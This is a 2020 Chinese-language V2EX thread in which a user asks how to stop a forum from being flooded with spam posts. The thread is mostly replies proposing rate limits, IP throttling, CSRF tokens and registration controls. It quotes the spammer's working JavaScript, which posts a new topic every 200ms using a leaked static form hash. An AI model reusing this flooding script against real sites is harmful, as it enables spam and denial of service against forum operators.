V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
wfdaj
V2EX  ›  PHP

我知道程序写得一般,但这种灌水情况一般如何处理?

  •  
  •   wfdaj · 2020-02-12 20:11:57 +08:00 · 5585 次点击
    这是一个创建于 1728 天前的主题,其中的信息可能已经有所发展或是发生改变。

    一个帖子被灌水 7 万多页的回复,整个论坛被灌水无数帖... 而且灌水者还发了帖:https://www.94cb.com/t/54367

    (function() {
        setInterval(function() {
            $.post("/new", {
                FormHash: "1d65517c",
                Title: "iHacker 刷帖-" + parseInt(Math.random() * 1000000000000).toString(16),
                Content: "看你怎么删!<img src=\"/static/editor/dialogs/emotion/images/i_f25.png\" /><br/>Google DDOS Attacker.",
                Tag: ["Google", "DDOS", "刷帖", "黑客"]
            },
            function(rq) {
                posted(rq.TopicID);
            });
        },
        200);
    })();
    function posted(id) {
        console.log("成功发帖! ID:" + id);
    }
    
    18 条回复    2020-02-26 02:46:01 +08:00
    walpurgis
        1
    walpurgis  
       2020-02-12 20:19:31 +08:00
    链接里刷帖的人不是写了解决方法了么
    airyland
        2
    airyland  
       2020-02-12 20:20:44 +08:00
    人家还给了你解决方法。。
    先把该上的上了:
    发帖最小间隔限制 /单小时 /单天频率限制,新注册发帖限制,ip 频率限制,重复文字限制。
    然后再考虑对垃圾信息 /无意义回复进行识别。

    另外,你这个站是国内的,按照网络安全法,你得对用户进行实名认证,至少需要绑定手机。
    ebingtel
        3
    ebingtel  
       2020-02-12 20:27:28 +08:00
    nginx 限制 ip 的访问频率 最简单……
    yankebupt
        4
    yankebupt  
       2020-02-12 20:29:26 +08:00   ❤️ 1
    2 楼别欺负人了
    本来说这黑客也太欺负新手了,
    后来看到代码连静态 FormHash 都贴出来了……
    这就是楼主的不对了......

    其实我更加严重怀疑这只是个骗流量的链接......你们觉得是不是
    15955598765
        5
    15955598765  
       2020-02-12 20:37:53 +08:00
    体验了一下,速度真的蛮快的!赞一个!!!
    oott123
        6
    oott123  
       2020-02-12 20:51:55 +08:00 via Android
    …这是在秀下限
    Valid
        7
    Valid  
       2020-02-12 20:56:04 +08:00
    请让他来 v2 刷
    ben1024
        8
    ben1024  
       2020-02-12 20:59:13 +08:00
    csrf_token。。。
    哈哈哈哈哈
    xd314697475
        9
    xd314697475  
       2020-02-12 21:02:38 +08:00
    这个论坛性能确实挺好的
    主机什么配置啊?
    veike
        10
    veike  
       2020-02-12 21:11:12 +08:00
    @xd314697475 每隔 200ms 执行一次
    wfdaj
        11
    wfdaj  
    OP
       2020-02-12 21:11:28 +08:00
    论坛不是我的,程序也不是我写的。只是想看看有没有比较高效的解决办法。😂
    chenqh
        12
    chenqh  
       2020-02-12 21:20:56 +08:00
    我记得这个论坛的作者在 v2 呀
    chenqh
        13
    chenqh  
       2020-02-12 21:23:52 +08:00   ❤️ 1
    不过性能确实好,翻了那么多页,居然不卡,不亏是 tx 大佬
    mxalbert1996
        14
    mxalbert1996  
       2020-02-13 00:35:03 +08:00 via Android
    在墙外根本打不开。。。
    zhoushiya
        15
    zhoushiya  
       2020-02-13 01:07:48 +08:00
    @lincanbin 作者现在不管了吧
    xyjincan
        16
    xyjincan  
       2020-02-13 10:32:45 +08:00
    限制注册,封号!
    lincanbin
        17
    lincanbin  
       2020-02-26 02:43:36 +08:00 via Android
    人在 PCG,已经连续上班三个月了,等下班了就处理
    @zhoushiya
    lincanbin
        18
    lincanbin  
       2020-02-26 02:46:01 +08:00 via Android
    @yankebupt FormHash 是编码时的 bug,之前就已经修复了
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2967 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 25ms · UTC 00:19 · PVG 08:19 · LAX 16:19 · JFK 19:19
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.